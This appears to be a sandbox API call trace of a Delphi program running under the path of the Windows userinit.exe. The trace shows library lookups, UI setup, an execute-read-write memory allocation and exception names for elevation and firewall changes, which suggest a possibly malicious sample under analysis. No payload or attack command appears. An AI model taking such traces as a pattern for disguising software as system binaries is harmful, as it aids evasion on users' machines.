[0140.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x18f4a8, cchData=256 | out: lpLCData="0") returned 2
[0140.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x18f4a8, cchData=256 | out: lpLCData="0") returned 2
[0140.220] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x18f5a0, cchData=2 | out: lpLCData=",") returned 2
[0140.220] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0140.220] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0140.220] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0140.220] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0140.221] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0140.221] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0140.221] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0140.221] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0140.221] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0140.221] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0140.221] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0140.221] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0140.221] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0140.221] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0140.221] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0140.221] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0140.222] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0140.222] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0140.222] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0140.222] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0140.222] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0140.222] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0140.222] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0140.222] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xa8
[0140.222] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xa0
[0140.222] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xac
[0140.222] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0140.222] GetDC (hWnd=0x0) returned 0x5501085a
[0140.223] GetDeviceCaps (hdc=0x5501085a, index=90) returned 96
[0140.223] ReleaseDC (hWnd=0x0, hDC=0x5501085a) returned 1
[0140.223] GetDC (hWnd=0x0) returned 0x5501085a
[0140.223] GetDeviceCaps (hdc=0x5501085a, index=104) returned 0
[0140.223] ReleaseDC (hWnd=0x0, hDC=0x5501085a) returned 1
[0140.223] CreatePalette (plpal=0x18f204) returned 0x3e080866
[0140.223] GetStockObject (i=7) returned 0x1b00017
[0140.223] GetStockObject (i=5) returned 0x1900015
[0140.223] GetStockObject (i=13) returned 0x18a002e
[0140.223] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0140.223] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0140.223] LoadStringA (in: hInstance=0x29a0000, uID=0xff3d, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0140.223] LoadStringA (in: hInstance=0x29a0000, uID=0xff3c, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0140.223] LoadStringA (in: hInstance=0x29a0000, uID=0xff3b, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0140.223] LoadStringA (in: hInstance=0x29a0000, uID=0xff3a, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0140.223] LoadStringA (in: hInstance=0x29a0000, uID=0xff39, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0140.223] LoadStringA (in: hInstance=0x29a0000, uID=0xff38, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0140.223] LoadStringA (in: hInstance=0x29a0000, uID=0xff37, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0140.223] LoadStringA (in: hInstance=0x29a0000, uID=0xff36, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0140.223] LoadStringA (in: hInstance=0x29a0000, uID=0xff35, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0140.223] LoadStringA (in: hInstance=0x29a0000, uID=0xff34, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0140.223] LoadStringA (in: hInstance=0x29a0000, uID=0xff33, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0140.223] LoadStringA (in: hInstance=0x29a0000, uID=0xff32, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0140.223] LoadStringA (in: hInstance=0x29a0000, uID=0xff31, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0140.224] LoadStringA (in: hInstance=0x29a0000, uID=0xff30, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0140.224] LoadStringA (in: hInstance=0x29a0000, uID=0xff4f, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0140.224] LoadStringA (in: hInstance=0x29a0000, uID=0xff4e, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0140.224] LoadStringA (in: hInstance=0x29a0000, uID=0xff4d, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0140.224] LoadStringA (in: hInstance=0x29a0000, uID=0xff4c, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0140.224] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0140.224] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0140.224] GetCurrentThreadId () returned 0x89c
[0140.224] GlobalAddAtomA (lpString="WndProcPtr029A00000000089C") returned 0xc122
[0140.224] LoadStringA (in: hInstance=0x29a0000, uID=0xfefc, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0140.224] LoadStringA (in: hInstance=0x29a0000, uID=0xfefb, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0140.224] LoadStringA (in: hInstance=0x29a0000, uID=0xfefa, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0140.224] LoadStringA (in: hInstance=0x29a0000, uID=0xfef9, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0140.224] LoadStringA (in: hInstance=0x29a0000, uID=0xfef8, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0140.224] LoadStringA (in: hInstance=0x29a0000, uID=0xfef7, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0140.224] LoadStringA (in: hInstance=0x29a0000, uID=0xfef6, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0140.224] LoadStringA (in: hInstance=0x29a0000, uID=0xfef5, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0140.224] LoadStringA (in: hInstance=0x29a0000, uID=0xfef4, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0140.224] LoadStringA (in: hInstance=0x29a0000, uID=0xfef3, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0140.224] LoadStringA (in: hInstance=0x29a0000, uID=0xfef2, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0140.224] LoadStringA (in: hInstance=0x29a0000, uID=0xfef1, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0140.225] LoadStringA (in: hInstance=0x29a0000, uID=0xfef0, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0140.225] LoadStringA (in: hInstance=0x29a0000, uID=0xff0f, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0140.225] LoadStringA (in: hInstance=0x29a0000, uID=0xff0e, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0140.225] LoadStringA (in: hInstance=0x29a0000, uID=0xff0d, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0140.225] LoadStringA (in: hInstance=0x29a0000, uID=0xff0c, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0140.225] LoadStringA (in: hInstance=0x29a0000, uID=0xff0b, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0140.225] LoadStringA (in: hInstance=0x29a0000, uID=0xff0a, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0140.225] LoadStringA (in: hInstance=0x29a0000, uID=0xff09, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0140.225] LoadStringA (in: hInstance=0x29a0000, uID=0xff08, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0140.225] LoadStringA (in: hInstance=0x29a0000, uID=0xff07, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0140.225] LoadStringA (in: hInstance=0x29a0000, uID=0xff06, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0140.225] LoadStringA (in: hInstance=0x29a0000, uID=0xff05, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0140.225] LoadStringA (in: hInstance=0x29a0000, uID=0xff04, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0140.225] LoadStringA (in: hInstance=0x29a0000, uID=0xff03, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0140.225] LoadStringA (in: hInstance=0x29a0000, uID=0xff02, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0140.225] LoadStringA (in: hInstance=0x29a0000, uID=0xff01, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0140.225] LoadStringA (in: hInstance=0x29a0000, uID=0xff00, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0140.225] LoadStringA (in: hInstance=0x29a0000, uID=0xff1f, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0140.225] LoadStringA (in: hInstance=0x29a0000, uID=0xff1e, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0140.225] LoadStringA (in: hInstance=0x29a0000, uID=0xff1d, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0140.225] LoadStringA (in: hInstance=0x29a0000, uID=0xff1c, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0140.225] LoadStringA (in: hInstance=0x29a0000, uID=0xff1b, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0140.225] LoadStringA (in: hInstance=0x29a0000, uID=0xff1a, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0140.225] LoadStringA (in: hInstance=0x29a0000, uID=0xff19, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0140.225] LoadStringA (in: hInstance=0x29a0000, uID=0xff18, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0140.225] LoadStringA (in: hInstance=0x29a0000, uID=0xff17, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0140.225] LoadStringA (in: hInstance=0x29a0000, uID=0xff16, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0140.225] LoadStringA (in: hInstance=0x29a0000, uID=0xff15, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0140.225] LoadStringA (in: hInstance=0x29a0000, uID=0xff14, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0140.225] LoadStringA (in: hInstance=0x29a0000, uID=0xff13, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0140.225] LoadStringA (in: hInstance=0x29a0000, uID=0xff12, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0140.225] LoadStringA (in: hInstance=0x29a0000, uID=0xff11, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0140.225] LoadStringA (in: hInstance=0x29a0000, uID=0xff10, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0140.225] LoadStringA (in: hInstance=0x29a0000, uID=0xff2f, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0140.226] LoadStringA (in: hInstance=0x29a0000, uID=0xff2e, lpBuffer=0x18f200, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0140.226] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0140.226] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0140.226] GetVersion () returned 0x1db10106
[0140.226] GetCurrentProcessId () returned 0x8a4
[0140.226] GlobalAddAtomA (lpString="Delphi000008A4") returned 0xc128
[0140.226] GetCurrentThreadId () returned 0x89c
[0140.226] GlobalAddAtomA (lpString="ControlOfs029A00000000089C") returned 0xc121
[0140.226] RegisterClipboardFormatA (lpszFormat="ControlOfs029A00000000089C") returned 0xc176
[0140.226] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0140.226] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0140.226] GetSystemMetrics (nIndex=19) returned 1
[0140.226] GetSystemMetrics (nIndex=75) returned 1
[0140.226] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x2ac1320, fWinIni=0x0 | out: pvParam=0x2ac1320) returned 1
[0140.226] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0140.226] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0140.226] LoadCursorA (hInstance=0x29a0000, lpCursorName=0x7ff9) returned 0xa01cd
[0140.226] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0140.226] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0140.227] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0140.227] LoadCursorA (hInstance=0x29a0000, lpCursorName=0x7ffa) returned 0x901cb
[0140.227] LoadCursorA (hInstance=0x29a0000, lpCursorName=0x7ffb) returned 0x801ab
[0140.227] LoadCursorA (hInstance=0x29a0000, lpCursorName=0x7ffc) returned 0x901a7
[0140.227] LoadCursorA (hInstance=0x29a0000, lpCursorName=0x7ffd) returned 0x9019d
[0140.227] LoadCursorA (hInstance=0x29a0000, lpCursorName=0x7fff) returned 0x701f9
[0140.227] LoadCursorA (hInstance=0x29a0000, lpCursorName=0x7ffe) returned 0x801e3
[0140.228] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0140.228] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0140.228] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0140.228] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0140.228] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0140.228] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0140.228] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0140.228] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0140.228] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0140.228] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0140.228] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0140.228] GetDC (hWnd=0x0) returned 0x5501085a
[0140.228] GetDeviceCaps (hdc=0x5501085a, index=90) returned 96
[0140.228] ReleaseDC (hWnd=0x0, hDC=0x5501085a) returned 1
[0140.228] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0140.228] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x29f9a60, dwData=0x2ac156c) returned 1
[0140.228] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x18f56b, fWinIni=0x0 | out: pvParam=0x18f56b) returned 1
[0140.228] CreateFontIndirectA (lplf=0x18f56b) returned 0x220a0894
[0140.228] GetObjectA (in: h=0x220a0894, c=60, pv=0x18f35c | out: pv=0x18f35c) returned 60
[0140.228] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x18f417, fWinIni=0x0 | out: pvParam=0x18f417) returned 1
[0140.228] CreateFontIndirectA (lplf=0x18f4f3) returned 0x3f0a0722
[0140.229] GetObjectA (in: h=0x3f0a0722, c=60, pv=0x18f35c | out: pv=0x18f35c) returned 60
[0140.229] CreateFontIndirectA (lplf=0x18f4b7) returned 0xfa0a088a
[0140.229] GetObjectA (in: h=0xfa0a088a, c=60, pv=0x18f35c | out: pv=0x18f35c) returned 60
[0140.229] LoadIconA (hInstance=0x0, lpIconName="MAINICON") returned 0x0
[0140.229] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f4cb, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0140.229] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x18f4cb | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0140.229] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x110000
[0140.229] GetKeyboardLayoutList (in: nBuff=64, lpList=0x18f44c | out: lpList=0x18f44c) returned 1
[0140.230] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0140.230] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0140.231] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6d7b0000
[0140.231] GetProcAddress (hModule=0x6d7b0000, lpProcName="InitializeFlatSB") returned 0x6d7e266f
[0140.231] GetProcAddress (hModule=0x6d7b0000, lpProcName="UninitializeFlatSB") returned 0x6d7e2542
[0140.231] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollProp") returned 0x6d7e1d29
[0140.231] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollProp") returned 0x6d7e238d
[0140.231] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_EnableScrollBar") returned 0x6d7e20c9
[0140.231] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_ShowScrollBar") returned 0x6d7e1fdb
[0140.231] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollRange") returned 0x6d7e1e8d
[0140.231] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollInfo") returned 0x6d7e1f0f
[0140.232] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollPos") returned 0x6d7e1ccd
[0140.232] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollPos") returned 0x6d7e216d
[0140.232] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollInfo") returned 0x6d7e22be
[0140.232] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollRange") returned 0x6d7e21e2
[0140.232] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0140.232] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0140.232] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0140.232] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76a20000
[0140.232] GetProcAddress (hModule=0x76a20000, lpProcName="CoCreateInstanceEx") returned 0x76a69d4e
[0140.232] GetProcAddress (hModule=0x76a20000, lpProcName="CoInitializeEx") returned 0x76a609ad
[0140.232] GetProcAddress (hModule=0x76a20000, lpProcName="CoAddRefServerProcess") returned 0x76a83cf3
[0140.232] GetProcAddress (hModule=0x76a20000, lpProcName="CoReleaseServerProcess") returned 0x76a84314
[0140.232] GetProcAddress (hModule=0x76a20000, lpProcName="CoResumeClassObjects") returned 0x76a2ea02
[0140.232] GetProcAddress (hModule=0x76a20000, lpProcName="CoSuspendClassObjects") returned 0x76a8bb02
[0140.232] LoadStringA (in: hInstance=0x29a0000, uID=0xff59, lpBuffer=0x18f1ac, cchBufferMax=1024 | out: lpBuffer="Metafiles") returned 0x9
[0140.233] CharLowerBuffA (in: lpsz="wmf", cchLength=0x3 | out: lpsz="wmf") returned 0x3
[0140.233] LoadStringA (in: hInstance=0x29a0000, uID=0xff5a, lpBuffer=0x18f1ac, cchBufferMax=1024 | out: lpBuffer="Enhanced Metafiles") returned 0x12
[0140.233] CharLowerBuffA (in: lpsz="emf", cchLength=0x3 | out: lpsz="emf") returned 0x3
[0140.233] LoadStringA (in: hInstance=0x29a0000, uID=0xff5b, lpBuffer=0x18f1ac, cchBufferMax=1024 | out: lpBuffer="Icons") returned 0x5
[0140.233] CharLowerBuffA (in: lpsz="ico", cchLength=0x3 | out: lpsz="ico") returned 0x3
[0140.233] LoadStringA (in: hInstance=0x29a0000, uID=0xff5c, lpBuffer=0x18f1ac, cchBufferMax=1024 | out: lpBuffer="Bitmaps") returned 0x7
[0140.233] CharLowerBuffA (in: lpsz="bmp", cchLength=0x3 | out: lpsz="bmp") returned 0x3
[0140.233] SetErrorMode (uMode=0x8000) returned 0x1
[0140.233] LoadLibraryA (lpLibFileName="olepro32.dll") returned 0x6d790000
[0140.235] SetErrorMode (uMode=0x1) returned 0x8000
[0140.235] GetProcAddress (hModule=0x6d790000, lpProcName="OleCreatePropertyFrame") returned 0x6d7920ea
[0140.235] GetProcAddress (hModule=0x6d790000, lpProcName="OleCreateFontIndirect") returned 0x6d7920b7
[0140.235] GetProcAddress (hModule=0x6d790000, lpProcName="OleCreatePictureIndirect") returned 0x6d7920c8
[0140.235] GetProcAddress (hModule=0x6d790000, lpProcName="OleLoadPicture") returned 0x6d7920d9
[0140.236] SysReAllocStringLen (in: pbstr=0x2a8fa98*=0x0, psz="EJwsclUnsupportedException", len=0x1a | out: pbstr=0x2a8fa98*="EJwsclUnsupportedException") returned 1
[0140.236] SysReAllocStringLen (in: pbstr=0x2a8fa80*=0x0, psz="EJwsclPIDException", len=0x12 | out: pbstr=0x2a8fa80*="EJwsclPIDException") returned 1
[0140.236] SysReAllocStringLen (in: pbstr=0x2a8fa68*=0x0, psz="EJwsclJwShellExecuteException", len=0x1d | out: pbstr=0x2a8fa68*="EJwsclJwShellExecuteException") returned 1
[0140.236] SysReAllocStringLen (in: pbstr=0x2a8fa50*=0x0, psz="EJwsclShellExecuteException", len=0x1b | out: pbstr=0x2a8fa50*="EJwsclShellExecuteException") returned 1
[0140.236] SysReAllocStringLen (in: pbstr=0x2a8fa38*=0x0, psz="EJwsclElevationException", len=0x18 | out: pbstr=0x2a8fa38*="EJwsclElevationException") returned 1
[0140.236] SysReAllocStringLen (in: pbstr=0x2a8fa20*=0x0, psz="EJwsclAbortException", len=0x14 | out: pbstr=0x2a8fa20*="EJwsclAbortException") returned 1
[0140.236] SysReAllocStringLen (in: pbstr=0x2a8fa08*=0x0, psz="EJwsclSuRunErrorException", len=0x19 | out: pbstr=0x2a8fa08*="EJwsclSuRunErrorException") returned 1
[0140.236] SysReAllocStringLen (in: pbstr=0x2a8f9f0*=0x0, psz="EJwsclElevateProcessException", len=0x1d | out: pbstr=0x2a8f9f0*="EJwsclElevateProcessException") returned 1
[0140.236] SysReAllocStringLen (in: pbstr=0x2a8f9d8*=0x0, psz="EJwsclCertApiException", len=0x16 | out: pbstr=0x2a8f9d8*="EJwsclCertApiException") returned 1
[0140.236] SysReAllocStringLen (in: pbstr=0x2a8f9c0*=0x0, psz="EJwsclVistaFeaturesDisabled", len=0x1b | out: pbstr=0x2a8f9c0*="EJwsclVistaFeaturesDisabled") returned 1
[0140.236] SysReAllocStringLen (in: pbstr=0x2a8f9a8*=0x0, psz="EJwsclInvalidStartupInfo", len=0x18 | out: pbstr=0x2a8f9a8*="EJwsclInvalidStartupInfo") returned 1
[0140.236] SysReAllocStringLen (in: pbstr=0x2a8f990*=0x0, psz="EJwsclFirewallNoExceptionsException", len=0x23 | out: pbstr=0x2a8f990*="EJwsclFirewallNoExceptionsException") returned 1
[0140.236] SysReAllocStringLen (in: pbstr=0x2a8f978*=0x0, psz="EJwsclFirewallInactiveException", len=0x1f | out: pbstr=0x2a8f978*="EJwsclFirewallInactiveException") returned 1
[0140.236] SysReAllocStringLen (in: pbstr=0x2a8f960*=0x0, psz="EJwsclFirewallDelRuleException", len=0x1e | out: pbstr=0x2a8f960*="EJwsclFirewallDelRuleException") returned 1
[0140.236] SysReAllocStringLen (in: pbstr=0x2a8f948*=0x0, psz="EJwsclAddUdpPortToFirewallException", len=0x23 | out: pbstr=0x2a8f948*="EJwsclAddUdpPortToFirewallException") returned 1
[0140.236] SysReAllocStringLen (in: pbstr=0x2a8f930*=0x0, psz="EJwsclAddTcpPortToFirewallException", len=0x23 | out: pbstr=0x2a8f930*="EJwsclAddTcpPortToFirewallException") returned 1
[0140.236] SysReAllocStringLen (in: pbstr=0x2a8f918*=0x0, psz="EJwsclFirewallAddRuleException", len=0x1e | out: pbstr=0x2a8f918*="EJwsclFirewallAddRuleException") returned 1
[0140.236] SysReAllocStringLen (in: pbstr=0x2a8f900*=0x0, psz="EJwsclSetRemoteAdminAdressException", len=0x23 | out: pbstr=0x2a8f900*="EJwsclSetRemoteAdminAdressException") returned 1
[0140.236] SysReAllocStringLen (in: pbstr=0x2a8f8e8*=0x0, psz="EJwsclGetRemoteAdminAdressException", len=0x23 | out: pbstr=0x2a8f8e8*="EJwsclGetRemoteAdminAdressException") returned 1
[0140.236] SysReAllocStringLen (in: pbstr=0x2a8f8d0*=0x0, psz="EJwsclSetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x2a8f8d0*="EJwsclSetRemoteAdminAllowedException") returned 1
[0140.236] SysReAllocStringLen (in: pbstr=0x2a8f8b8*=0x0, psz="EJwsclGetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x2a8f8b8*="EJwsclGetRemoteAdminAllowedException") returned 1
[0140.236] SysReAllocStringLen (in: pbstr=0x2a8f8a0*=0x0, psz="EJwsclSetIncomingPingAllowedException", len=0x25 | out: pbstr=0x2a8f8a0*="EJwsclSetIncomingPingAllowedException") returned 1
[0140.236] SysReAllocStringLen (in: pbstr=0x2a8f888*=0x0, psz="EJwsclGetIncomingPingAllowedException", len=0x25 | out: pbstr=0x2a8f888*="EJwsclGetIncomingPingAllowedException") returned 1
[0140.236] SysReAllocStringLen (in: pbstr=0x2a8f870*=0x0, psz="EJwsclSetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x2a8f870*="EJwsclSetFWExceptionsAllowedException") returned 1
[0140.236] SysReAllocStringLen (in: pbstr=0x2a8f858*=0x0, psz="EJwsclGetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x2a8f858*="EJwsclGetFWExceptionsAllowedException") returned 1
[0140.236] SysReAllocStringLen (in: pbstr=0x2a8f840*=0x0, psz="EJwsclGetFWStateException", len=0x19 | out: pbstr=0x2a8f840*="EJwsclGetFWStateException") returned 1
[0140.236] SysReAllocStringLen (in: pbstr=0x2a8f828*=0x0, psz="EJwsclSetFWStateException", len=0x19 | out: pbstr=0x2a8f828*="EJwsclSetFWStateException") returned 1
